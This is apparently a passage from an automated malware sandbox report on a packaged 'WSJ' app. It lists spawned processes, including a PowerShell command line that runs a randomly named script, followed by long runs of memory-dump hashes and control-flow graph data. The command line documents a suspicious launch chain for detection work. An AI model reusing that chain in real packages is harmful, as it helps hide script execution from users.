                                                                                                                Path:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
                                                                                                                Imagebase:0x7ff72f0d0000
                                                                                                                File size:293'376 bytes
                                                                                                                MD5 hash:2FEB69B26AB8966F050BA56641E8438A
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:39
                                                                                                                Start time:17:00:15
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
                                                                                                                Imagebase:0x7ff6c3640000
                                                                                                                File size:379'312 bytes
                                                                                                                MD5 hash:C55F8E39801444DEBA32F5B94B5F1EB8
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:40
                                                                                                                Start time:17:00:15
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"PsfRunDll64.exe"
                                                                                                                Imagebase:0x7ff695d40000
                                                                                                                File size:118'704 bytes
                                                                                                                MD5 hash:8466F69926A22670DCF6515A4FC3C054
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:41
                                                                                                                Start time:17:00:15
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
                                                                                                                Imagebase:0x7ff711290000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:42
                                                                                                                Start time:17:00:15
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff772470000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:43
                                                                                                                Start time:17:00:17
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
                                                                                                                Imagebase:0x7ff711290000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1750207852.00007FF6C365A000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6C365A000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ff6c365a000_PsfLauncher64.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1666786595-0
                                                                                                                  • Opcode ID: 19875d533f4ac2c43f27f94d2277efbfeeab3d7115a8d459110bfb280ed655da
                                                                                                                  • Instruction ID: c12617c819254b7cb5481e479b15c5289b6873162478eb66296797ee45781e46
                                                                                                                  • Opcode Fuzzy Hash: 19875d533f4ac2c43f27f94d2277efbfeeab3d7115a8d459110bfb280ed655da
                                                                                                                  • Instruction Fuzzy Hash: A5418E20A0C2068AFB66BF3AD457AB932D1AF55302F100539E4CEEB2D3DE2C6805A751
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1750207852.00007FF6C365A000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6C365A000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ff6c365a000_PsfLauncher64.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 96c74e1e0dbeb617bde60a25e4beb2c6241c5db145c8aeac8e58c1cee0606da2
                                                                                                                  • Instruction ID: 7357b4b41e5b703cef658d9d6a434adb39612fe040b0d3aca4880be3e8ca2037
                                                                                                                  • Opcode Fuzzy Hash: 96c74e1e0dbeb617bde60a25e4beb2c6241c5db145c8aeac8e58c1cee0606da2
                                                                                                                  • Instruction Fuzzy Hash: 0311BC10E1C10B82FA187EB38857AFD31A59F50386F440474EAD9FB1C3ED6DA84063A2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1750207852.00007FF6C365A000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6C365A000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ff6c365a000_PsfLauncher64.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4f34546cbe6a87d54a16ce7b6152f2452906cc9768ad5084a12dad45389c5db4
                                                                                                                  • Instruction ID: 4351f6a3366b17d3b07c334e4aca1b48df0440250e6c53571e4de5ef5b53dc12
                                                                                                                  • Opcode Fuzzy Hash: 4f34546cbe6a87d54a16ce7b6152f2452906cc9768ad5084a12dad45389c5db4
                                                                                                                  • Instruction Fuzzy Hash: 3DE04F00A2990F0AF6993FBB889797860809F04253F541934E4EEE11D3FC1DA8517301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.1748750008.00007FF695D41000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF695D41000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_7ff695d41000_PsfRunDll64.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  • Opcode ID: 4b5772668ec87ec97671e5f7c3550c1486df12dc04b6af15680e0079c3f3bc95
                                                                                                                  • Instruction ID: de24e8cbfd397bb49c46e4ed5ee5da509d83c219fd941ec34c50f4d2e9589ee8
                                                                                                                  • Opcode Fuzzy Hash: 4b5772668ec87ec97671e5f7c3550c1486df12dc04b6af15680e0079c3f3bc95
                                                                                                                  • Instruction Fuzzy Hash: F3117714E0D14786FA747BF159462BD11D1CF42A85F4426B4E86ED71C3EE2CAC4C826A
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:2.5%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:9
                                                                                                                  Total number of Limit Nodes:0
                                                                                                                  execution_graph 38417 7ff9baf38a50 38419 7ff9baf38a59 IdentifyCodeAuthzLevelW 38417->38419 38420 7ff9baf4bb2e 38419->38420 38409 7ff9baf3941e 38410 7ff9baf3942d GetThreadPreferredUILanguages 38409->38410 38412 7ff9baf3952a 38410->38412 38413 7ff9baf38221 38414 7ff9baf3822f GetFileAttributesW 38413->38414 38416 7ff9baf382d6 38414->38416

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 2O_I$3O_I
                                                                                                                  • API String ID: 0-1954759320
                                                                                                                  • Opcode ID: 2267c1f48ef5b4773b3a59175b5c1b2338e2ab034e455c5ee87957b471e29351
                                                                                                                  • Instruction ID: 7d8e1e19a61ac1beca4cd2c0d183b38c604b693d1938569853053de5ffde6db2
                                                                                                                  • Opcode Fuzzy Hash: 2267c1f48ef5b4773b3a59175b5c1b2338e2ab034e455c5ee87957b471e29351
                                                                                                                  • Instruction Fuzzy Hash: 2F221126D0EA810BEB55DB6DA8553B92ED1FF92312F0801FBC589C71DBED68BA05C344
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a17b0120023818f51065f3afd70ee4123cacd0280639121bf9a19d3c76d369cc
                                                                                                                  • Instruction ID: 44a100daa7306049b8b3c895e9c753738a73a45188d6a803cda43d06c6550d5f
                                                                                                                  • Opcode Fuzzy Hash: a17b0120023818f51065f3afd70ee4123cacd0280639121bf9a19d3c76d369cc
                                                                                                                  • Instruction Fuzzy Hash: C5236270909A498FE795DB28C855BE9BBF1EF99300F0001FAD04DD76A2DE786A84CF51
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3bb3e68045ffb77cf19489cd15c62c9dae142398f63666658ac4f6a34efaf239
                                                                                                                  • Instruction ID: 32e2817f06420f997d3e58a6879e2f5234865c0eb49c6dbf698672ee920b9836
                                                                                                                  • Opcode Fuzzy Hash: 3bb3e68045ffb77cf19489cd15c62c9dae142398f63666658ac4f6a34efaf239
                                                                                                                  • Instruction Fuzzy Hash: 4C02CC31A0AA5A8BEB98DF5CC8617B977E2FF99304F044079D44EC72D2DE68B8528740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2441953396.00007FF9BB1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb1a0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: '_^]$'_^`$'_^c$8(_^
                                                                                                                  • API String ID: 0-1215133575
                                                                                                                  • Opcode ID: c5fdac5c9a36391574d152419879c7f8fe99fd09e449cd595f341a5e8839a6b9
                                                                                                                  • Instruction ID: 98c09334dee85f3efb195f6cd059f8e5b8d1b00900343eb31b473f2d3557df35
                                                                                                                  • Opcode Fuzzy Hash: c5fdac5c9a36391574d152419879c7f8fe99fd09e449cd595f341a5e8839a6b9
                                                                                                                  • Instruction Fuzzy Hash: DB318A56F0DA991FE360EB2C68962F56BD1FF8626871801F7D09DCA0D3EC187C068644
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 675 7ff9baf3941e-7ff9baf3942b 676 7ff9baf3942d-7ff9baf39435 675->676 677 7ff9baf39436-7ff9baf39447 675->677 676->677 678 7ff9baf39449-7ff9baf39451 677->678 679 7ff9baf39452-7ff9baf394df 677->679 678->679 682 7ff9baf394e9-7ff9baf39528 GetThreadPreferredUILanguages 679->682 683 7ff9baf394e1-7ff9baf394e6 679->683 684 7ff9baf3952a 682->684 685 7ff9baf39530-7ff9baf3955b 682->685 683->682 684->685
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LanguagesPreferredThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 842807343-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 686 7ff9baf38221-7ff9baf3822d 687 7ff9baf3822f 686->687 688 7ff9baf38231-7ff9baf3826a 686->688 687->688 689 7ff9baf38271-7ff9baf38298 687->689 688->689 691 7ff9baf3829a-7ff9baf3829f 689->691 692 7ff9baf382a2-7ff9baf382d4 GetFileAttributesW 689->692 691->692 693 7ff9baf382dc-7ff9baf38301 692->693 694 7ff9baf382d6 692->694 694->693
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2427705825.00007FF9BAF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9baf30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1471 7ff9bb6a1670-7ff9bb6a168a 1474 7ff9bb6a1647-7ff9bb6a1656 1471->1474 1475 7ff9bb6a168c-7ff9bb6a169a 1471->1475 1481 7ff9bb6a165d-7ff9bb6a166e 1474->1481 1478 7ff9bb6a1657 1475->1478 1479 7ff9bb6a169c-7ff9bb6a18f0 1475->1479 1478->1481 1517 7ff9bb6a18f6-7ff9bb6a1901 1479->1517 1518 7ff9bb6a197b-7ff9bb6a19ba 1479->1518 1481->1471 1519 7ff9bb6a1903-7ff9bb6a1916 1517->1519 1520 7ff9bb6a1918-7ff9bb6a1932 1517->1520 1531 7ff9bb6a1977-7ff9bb6a1978 1518->1531 1532 7ff9bb6a19bc-7ff9bb6a19cc 1518->1532 1519->1520 1528 7ff9bb6a1934-7ff9bb6a1947 1520->1528 1529 7ff9bb6a1949-7ff9bb6a1976 1520->1529 1528->1529 1529->1531 1535 7ff9bb6a1979 1531->1535 1536 7ff9bb6a19ce-7ff9bb6a19d8 1532->1536 1535->1535 1537 7ff9bb6a19df-7ff9bb6a19e7 1536->1537
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2464311547.00007FF9BB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB530000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb530000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2464311547.00007FF9BB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB530000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb530000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2473544356.00007FF9BB690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB690000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb690000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `
                                                                                                                  • API String ID: 0-2679148245
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fadde93b8c174a61fef4c1e1c4c62c1b47b7f3a1604e8bea97ad8553d29868e1
                                                                                                                  • Instruction ID: 8a7ca70900bb24d7bfe9b3ac2a30990299193551a2e6b134d5505e6a57abbeb7
                                                                                                                  • Opcode Fuzzy Hash: fadde93b8c174a61fef4c1e1c4c62c1b47b7f3a1604e8bea97ad8553d29868e1
                                                                                                                  • Instruction Fuzzy Hash: 15B25E30A196494FD3A8EF3C805536AB7D2FF89209F1086BDD14EC76E6DE78E9428741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: df3885ca2a5a22490075e27a8361ac5751f4f795e8f09464f9779d41c1e66e33
                                                                                                                  • Instruction ID: 1fce3b2fb71d4233bf3e18cf29a2418a679794524748f2965c9688be13990da8
                                                                                                                  • Opcode Fuzzy Hash: df3885ca2a5a22490075e27a8361ac5751f4f795e8f09464f9779d41c1e66e33
                                                                                                                  • Instruction Fuzzy Hash: C8B28330A1D6484FD368EF3C8465669BBD2FF89304F1486BEE14EC72E2DE78A9458741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0ca9bcd03934cb17186776bbd551596dd40df92b200fc2d138bbfc2db5f8f343
                                                                                                                  • Instruction ID: 7d2b60d7833000fd54ea3ff697582eb32f53356732a0b9e4b6724741ca736b9c
                                                                                                                  • Opcode Fuzzy Hash: 0ca9bcd03934cb17186776bbd551596dd40df92b200fc2d138bbfc2db5f8f343
                                                                                                                  • Instruction Fuzzy Hash: DDA2F731A0D6454FD364EF3C90552AABBE1FF8A318B1485BEE18ECB1E3DD78A8418745
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1fd140c0636027d6a1cab8a41a91cef521b2aef905970a181296fed11cb5f9f8
                                                                                                                  • Instruction ID: dadc159c44c6a5a68a9a3b3f94400096bf9d2fdcb4f965bf43f4cf7600394425
                                                                                                                  • Opcode Fuzzy Hash: 1fd140c0636027d6a1cab8a41a91cef521b2aef905970a181296fed11cb5f9f8
                                                                                                                  • Instruction Fuzzy Hash: 6F82B330A1D6488FD369EF3C8455269B7D2FF89308B1449BDE14ECB2E2DE79E9428741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1838927128f5223db72fc436d9232dc74c182472c21866b6c79de6d37e1dd4ea
                                                                                                                  • Instruction ID: 80506cda2d509dec2edb877a2ec082ff81b7b3eae8026456679f6255bb5148a2
                                                                                                                  • Opcode Fuzzy Hash: 1838927128f5223db72fc436d9232dc74c182472c21866b6c79de6d37e1dd4ea
                                                                                                                  • Instruction Fuzzy Hash: AB729130A196494FD369EF3C805536AB7D2FF89308B144ABED14EC72E6DE78E9428741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a484331c48b1d5c0bc6d6e11a9be6dced4f8068da51b0696ec52b987e4e7843b
                                                                                                                  • Instruction ID: b2668c6d3a2c662041923ae3f63d8094cac64e34611ef434729cf8e5faaab4b9
                                                                                                                  • Opcode Fuzzy Hash: a484331c48b1d5c0bc6d6e11a9be6dced4f8068da51b0696ec52b987e4e7843b
                                                                                                                  • Instruction Fuzzy Hash: E872A030A1DA494FD368EF3C805536AB7D2FF89304B1446BEE14EC76E2DE79A9428741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2464311547.00007FF9BB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB530000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb530000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 84597f03104d7882525ee3b2c8849760e692abfe253ab302e9d90cd0fa8e9039
                                                                                                                  • Instruction ID: 14da90cb34cc5c333b72a9215380d2cff4f7fbb0b77a8822f47e6bb62806c76b
                                                                                                                  • Opcode Fuzzy Hash: 84597f03104d7882525ee3b2c8849760e692abfe253ab302e9d90cd0fa8e9039
                                                                                                                  • Instruction Fuzzy Hash: 8B520120A1CD8A4FEB98EB2C94457B977D1FF55310F5040BAD04EC71DBDEA9B9428782
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
